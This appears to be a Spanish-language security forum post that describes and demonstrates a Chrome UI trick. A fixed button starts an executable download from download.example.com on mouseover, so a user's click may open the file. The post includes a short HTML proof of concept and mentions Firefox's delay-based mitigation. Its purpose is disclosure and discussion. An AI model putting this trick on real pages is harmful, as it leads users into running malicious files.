No estoy seguro de que esto pueda llamarse realmente una vulnerabilidad ... Sin embargo, este comportamiento podría no ser deseado.
Me imagino una posible vulnerabilidad como esta:
- El usuario está en un sitio web
- Haga que el usuario haga clic en un botón en la parte inferior izquierda de la pantalla (fije la posición del botón para que nunca cambie su posición en la pantalla)
- Tan pronto como el usuario tenga el mouse sobre el botón (onMouseOver) inicie la descarga de un archivo ejecutable
- La barra de descarga de Chrome aparece y el archivo descargado está ahora donde estaba el botón
- Si el usuario presiona el botón del mouse, podría abrir accidentalmente el archivo descargado (si ya está completamente descargado).
Depende del sistema operativo si el archivo descargado se ejecuta directamente o si presenta otra advertencia al usuario.
He construido un pequeño ejemplo. Esto supone que download.example.com inicia automáticamente una descarga. Y si no eres muy rápido haciendo clic, entonces funciona y acabas de abrir un archivo (tal vez malicioso).
<html>
<body>
<button type="button"
onMouseOver="window.location.assign('http://download.example.com/')"
style="position: fixed; bottom: 1em; left: 1em;">Click Me!</button>
</body>
</html>
ElnavegadorFirefoxprevienedichosataquesdeformapredeterminadaalagregarunretrasoenelbotóndedescarga(vealapregunta ¿El retraso en el botón de guardado en un diálogo de descarga de Firefox es una característica de seguridad? )